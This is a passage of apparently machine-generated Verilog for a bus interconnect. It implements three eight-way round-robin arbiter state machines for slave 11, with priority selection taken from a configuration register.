                        s11_msel_arb0_next_state = s11_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s11_msel_arb0_req[6] ) 
                        begin
                            s11_msel_arb0_next_state = s11_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s11_msel_arb0_req[7] ) 
                            begin
                                s11_msel_arb0_next_state = s11_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s11_msel_arb0_req[0] ) 
                                begin
                                    s11_msel_arb0_next_state = s11_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb0_req[1] ) 
                                    begin
                                        s11_msel_arb0_next_state = s11_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb0_req[2] ) 
                                        begin
                                            s11_msel_arb0_next_state = s11_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb0_grant4:
        begin
            if (  !( s11_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s11_msel_arb0_req[5] ) 
                begin
                    s11_msel_arb0_next_state = s11_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s11_msel_arb0_req[6] ) 
                    begin
                        s11_msel_arb0_next_state = s11_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s11_msel_arb0_req[7] ) 
                        begin
                            s11_msel_arb0_next_state = s11_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s11_msel_arb0_req[0] ) 
                            begin
                                s11_msel_arb0_next_state = s11_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s11_msel_arb0_req[1] ) 
                                begin
                                    s11_msel_arb0_next_state = s11_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb0_req[2] ) 
                                    begin
                                        s11_msel_arb0_next_state = s11_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb0_req[3] ) 
                                        begin
                                            s11_msel_arb0_next_state = s11_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb0_grant5:
        begin
            if (  !( s11_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s11_msel_arb0_req[6] ) 
                begin
                    s11_msel_arb0_next_state = s11_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s11_msel_arb0_req[7] ) 
                    begin
                        s11_msel_arb0_next_state = s11_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s11_msel_arb0_req[0] ) 
                        begin
                            s11_msel_arb0_next_state = s11_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s11_msel_arb0_req[1] ) 
                            begin
                                s11_msel_arb0_next_state = s11_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s11_msel_arb0_req[2] ) 
                                begin
                                    s11_msel_arb0_next_state = s11_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb0_req[3] ) 
                                    begin
                                        s11_msel_arb0_next_state = s11_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb0_req[4] ) 
                                        begin
                                            s11_msel_arb0_next_state = s11_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb0_grant6:
        begin
            if (  !( s11_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s11_msel_arb0_req[7] ) 
                begin
                    s11_msel_arb0_next_state = s11_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s11_msel_arb0_req[0] ) 
                    begin
                        s11_msel_arb0_next_state = s11_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s11_msel_arb0_req[1] ) 
                        begin
                            s11_msel_arb0_next_state = s11_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s11_msel_arb0_req[2] ) 
                            begin
                                s11_msel_arb0_next_state = s11_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s11_msel_arb0_req[3] ) 
                                begin
                                    s11_msel_arb0_next_state = s11_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb0_req[4] ) 
                                    begin
                                        s11_msel_arb0_next_state = s11_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb0_req[5] ) 
                                        begin
                                            s11_msel_arb0_next_state = s11_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb0_grant7:
        begin
            if (  !( s11_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s11_msel_arb0_req[0] ) 
                begin
                    s11_msel_arb0_next_state = s11_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s11_msel_arb0_req[1] ) 
                    begin
                        s11_msel_arb0_next_state = s11_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s11_msel_arb0_req[2] ) 
                        begin
                            s11_msel_arb0_next_state = s11_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s11_msel_arb0_req[3] ) 
                            begin
                                s11_msel_arb0_next_state = s11_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s11_msel_arb0_req[4] ) 
                                begin
                                    s11_msel_arb0_next_state = s11_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb0_req[5] ) 
                                    begin
                                        s11_msel_arb0_next_state = s11_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb0_req[6] ) 
                                        begin
                                            s11_msel_arb0_next_state = s11_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s11_msel_arb1_req = { ( s11_msel_req[7] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) } == 2'd1 ) ), ( s11_msel_req[6] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) } == 2'd1 ) ), ( s11_msel_req[5] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) } == 2'd1 ) ), ( s11_msel_req[4] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) } == 2'd1 ) ), ( s11_msel_req[3] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) } == 2'd1 ) ), ( s11_msel_req[2] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) } == 2'd1 ) ), ( s11_msel_req[1] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) } == 2'd1 ) ), ( s11_msel_req[0] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s11_msel_arb1_state <= s11_msel_arb1_grant0;
        end
        else
        begin 
            s11_msel_arb1_state <= s11_msel_arb1_next_state;
        end
    end
    always @ (  s11_msel_arb1_state or  { ( s11_msel_req[7] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) } == 2'd1 ) ), ( s11_msel_req[6] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) } == 2'd1 ) ), ( s11_msel_req[5] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) } == 2'd1 ) ), ( s11_msel_req[4] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) } == 2'd1 ) ), ( s11_msel_req[3] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) } == 2'd1 ) ), ( s11_msel_req[2] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) } == 2'd1 ) ), ( s11_msel_req[1] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) } == 2'd1 ) ), ( s11_msel_req[0] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s11_msel_arb1_next_state = s11_msel_arb1_state;
        case ( s11_msel_arb1_state ) 
        s11_msel_arb1_grant0:
        begin
            if (  !( s11_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s11_msel_arb1_req[1] ) 
                begin
                    s11_msel_arb1_next_state = s11_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s11_msel_arb1_req[2] ) 
                    begin
                        s11_msel_arb1_next_state = s11_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s11_msel_arb1_req[3] ) 
                        begin
                            s11_msel_arb1_next_state = s11_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s11_msel_arb1_req[4] ) 
                            begin
                                s11_msel_arb1_next_state = s11_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s11_msel_arb1_req[5] ) 
                                begin
                                    s11_msel_arb1_next_state = s11_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb1_req[6] ) 
                                    begin
                                        s11_msel_arb1_next_state = s11_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb1_req[7] ) 
                                        begin
                                            s11_msel_arb1_next_state = s11_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb1_grant1:
        begin
            if (  !( s11_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s11_msel_arb1_req[2] ) 
                begin
                    s11_msel_arb1_next_state = s11_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s11_msel_arb1_req[3] ) 
                    begin
                        s11_msel_arb1_next_state = s11_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s11_msel_arb1_req[4] ) 
                        begin
                            s11_msel_arb1_next_state = s11_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s11_msel_arb1_req[5] ) 
                            begin
                                s11_msel_arb1_next_state = s11_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s11_msel_arb1_req[6] ) 
                                begin
                                    s11_msel_arb1_next_state = s11_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb1_req[7] ) 
                                    begin
                                        s11_msel_arb1_next_state = s11_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb1_req[0] ) 
                                        begin
                                            s11_msel_arb1_next_state = s11_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb1_grant2:
        begin
            if (  !( s11_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s11_msel_arb1_req[3] ) 
                begin
                    s11_msel_arb1_next_state = s11_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s11_msel_arb1_req[4] ) 
                    begin
                        s11_msel_arb1_next_state = s11_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s11_msel_arb1_req[5] ) 
                        begin
                            s11_msel_arb1_next_state = s11_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s11_msel_arb1_req[6] ) 
                            begin
                                s11_msel_arb1_next_state = s11_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s11_msel_arb1_req[7] ) 
                                begin
                                    s11_msel_arb1_next_state = s11_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb1_req[0] ) 
                                    begin
                                        s11_msel_arb1_next_state = s11_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb1_req[1] ) 
                                        begin
                                            s11_msel_arb1_next_state = s11_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb1_grant3:
        begin
            if (  !( s11_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s11_msel_arb1_req[4] ) 
                begin
                    s11_msel_arb1_next_state = s11_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s11_msel_arb1_req[5] ) 
                    begin
                        s11_msel_arb1_next_state = s11_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s11_msel_arb1_req[6] ) 
                        begin
                            s11_msel_arb1_next_state = s11_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s11_msel_arb1_req[7] ) 
                            begin
                                s11_msel_arb1_next_state = s11_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s11_msel_arb1_req[0] ) 
                                begin
                                    s11_msel_arb1_next_state = s11_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb1_req[1] ) 
                                    begin
                                        s11_msel_arb1_next_state = s11_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb1_req[2] ) 
                                        begin
                                            s11_msel_arb1_next_state = s11_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb1_grant4:
        begin
            if (  !( s11_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s11_msel_arb1_req[5] ) 
                begin
                    s11_msel_arb1_next_state = s11_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s11_msel_arb1_req[6] ) 
                    begin
                        s11_msel_arb1_next_state = s11_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s11_msel_arb1_req[7] ) 
                        begin
                            s11_msel_arb1_next_state = s11_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s11_msel_arb1_req[0] ) 
                            begin
                                s11_msel_arb1_next_state = s11_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s11_msel_arb1_req[1] ) 
                                begin
                                    s11_msel_arb1_next_state = s11_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb1_req[2] ) 
                                    begin
                                        s11_msel_arb1_next_state = s11_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb1_req[3] ) 
                                        begin
                                            s11_msel_arb1_next_state = s11_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb1_grant5:
        begin
            if (  !( s11_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s11_msel_arb1_req[6] ) 
                begin
                    s11_msel_arb1_next_state = s11_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s11_msel_arb1_req[7] ) 
                    begin
                        s11_msel_arb1_next_state = s11_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s11_msel_arb1_req[0] ) 
                        begin
                            s11_msel_arb1_next_state = s11_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s11_msel_arb1_req[1] ) 
                            begin
                                s11_msel_arb1_next_state = s11_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s11_msel_arb1_req[2] ) 
                                begin
                                    s11_msel_arb1_next_state = s11_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb1_req[3] ) 
                                    begin
                                        s11_msel_arb1_next_state = s11_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb1_req[4] ) 
                                        begin
                                            s11_msel_arb1_next_state = s11_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb1_grant6:
        begin
            if (  !( s11_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s11_msel_arb1_req[7] ) 
                begin
                    s11_msel_arb1_next_state = s11_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s11_msel_arb1_req[0] ) 
                    begin
                        s11_msel_arb1_next_state = s11_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s11_msel_arb1_req[1] ) 
                        begin
                            s11_msel_arb1_next_state = s11_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s11_msel_arb1_req[2] ) 
                            begin
                                s11_msel_arb1_next_state = s11_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s11_msel_arb1_req[3] ) 
                                begin
                                    s11_msel_arb1_next_state = s11_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb1_req[4] ) 
                                    begin
                                        s11_msel_arb1_next_state = s11_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb1_req[5] ) 
                                        begin
                                            s11_msel_arb1_next_state = s11_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb1_grant7:
        begin
            if (  !( s11_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s11_msel_arb1_req[0] ) 
                begin
                    s11_msel_arb1_next_state = s11_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s11_msel_arb1_req[1] ) 
                    begin
                        s11_msel_arb1_next_state = s11_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s11_msel_arb1_req[2] ) 
                        begin
                            s11_msel_arb1_next_state = s11_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s11_msel_arb1_req[3] ) 
                            begin
                                s11_msel_arb1_next_state = s11_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s11_msel_arb1_req[4] ) 
                                begin
                                    s11_msel_arb1_next_state = s11_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb1_req[5] ) 
                                    begin
                                        s11_msel_arb1_next_state = s11_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb1_req[6] ) 
                                        begin
                                            s11_msel_arb1_next_state = s11_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s11_msel_arb2_req = { ( s11_msel_req[7] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) } == 2'd2 ) ), ( s11_msel_req[6] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) } == 2'd2 ) ), ( s11_msel_req[5] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) } == 2'd2 ) ), ( s11_msel_req[4] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) } == 2'd2 ) ), ( s11_msel_req[3] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) } == 2'd2 ) ), ( s11_msel_req[2] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) } == 2'd2 ) ), ( s11_msel_req[1] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) } == 2'd2 ) ), ( s11_msel_req[0] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s11_msel_arb2_state <= s11_msel_arb2_grant0;
        end
        else
        begin 
            s11_msel_arb2_state <= s11_msel_arb2_next_state;
        end
    end
    always @ (  s11_msel_arb2_state or  { ( s11_msel_req[7] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) } == 2'd2 ) ), ( s11_msel_req[6] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) } == 2'd2 ) ), ( s11_msel_req[5] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) } == 2'd2 ) ), ( s11_msel_req[4] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) } == 2'd2 ) ), ( s11_msel_req[3] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) } == 2'd2 ) ), ( s11_msel_req[2] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) } == 2'd2 ) ), ( s11_msel_req[1] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) } == 2'd2 ) ), ( s11_msel_req[0] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s11_msel_arb2_next_state = s11_msel_arb2_state;
        case ( s11_msel_arb2_state ) 
        s11_msel_arb2_grant0:
        begin
            if (  !( s11_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s11_msel_arb2_req[1] ) 
                begin
                    s11_msel_arb2_next_state = s11_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s11_msel_arb2_req[2] ) 
                    begin
                        s11_msel_arb2_next_state = s11_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s11_msel_arb2_req[3] ) 
                        begin
                            s11_msel_arb2_next_state = s11_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s11_msel_arb2_req[4] ) 
                            begin
                                s11_msel_arb2_next_state = s11_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s11_msel_arb2_req[5] ) 
                                begin
                                    s11_msel_arb2_next_state = s11_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb2_req[6] ) 
                                    begin
                                        s11_msel_arb2_next_state = s11_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb2_req[7] ) 
                                        begin
                                            s11_msel_arb2_next_state = s11_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb2_grant1:
        begin
            if (  !( s11_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s11_msel_arb2_req[2] ) 
                begin
                    s11_msel_arb2_next_state = s11_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s11_msel_arb2_req[3] ) 
                    begin
                        s11_msel_arb2_next_state = s11_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s11_msel_arb2_req[4] ) 
                        begin
                            s11_msel_arb2_next_state = s11_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s11_msel_arb2_req[5] ) 
                            begin
                                s11_msel_arb2_next_state = s11_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s11_msel_arb2_req[6] ) 
                                begin
                                    s11_msel_arb2_next_state = s11_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb2_req[7] ) 
                                    begin
                                        s11_msel_arb2_next_state = s11_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb2_req[0] ) 
                                        begin
                                            s11_msel_arb2_next_state = s11_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb2_grant2:
        begin
            if (  !( s11_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s11_msel_arb2_req[3] ) 
                begin
                    s11_msel_arb2_next_state = s11_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s11_msel_arb2_req[4] ) 
                    begin
                        s11_msel_arb2_next_state = s11_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s11_msel_arb2_req[5] ) 
                        begin
                            s11_msel_arb2_next_state = s11_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s11_msel_arb2_req[6] ) 
                            begin
                                s11_msel_arb2_next_state = s11_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s11_msel_arb2_req[7] ) 
                                begin
                                    s11_msel_arb2_next_state = s11_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb2_req[0] ) 
                                    begin
                                        s11_msel_arb2_next_state = s11_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb2_req[1] ) 
                                        begin
                                            s11_msel_arb2_next_state = s11_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb2_grant3:
        begin
            if (  !( s11_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s11_msel_arb2_req[4] ) 
                begin
                    s11_msel_arb2_next_state = s11_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s11_msel_arb2_req[5] ) 
                    begin
                        s11_msel_arb2_next_state = s11_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s11_msel_arb2_req[6] ) 
                        begin
                            s11_msel_arb2_next_state = s11_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s11_msel_arb2_req[7] ) 
                            begin
                                s11_msel_arb2_next_state = s11_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s11_msel_arb2_req[0] ) 
                                begin
                                    s11_msel_arb2_next_state = s11_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb2_req[1] ) 
                                    begin
                                        s11_msel_arb2_next_state = s11_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb2_req[2] ) 
                                        begin
                                            s11_msel_arb2_next_state = s11_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb2_grant4:
        begin
            if (  !( s11_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s11_msel_arb2_req[5] ) 
                begin
                    s11_msel_arb2_next_state = s11_msel_arb2_grant5;
                end
                else
                begin 
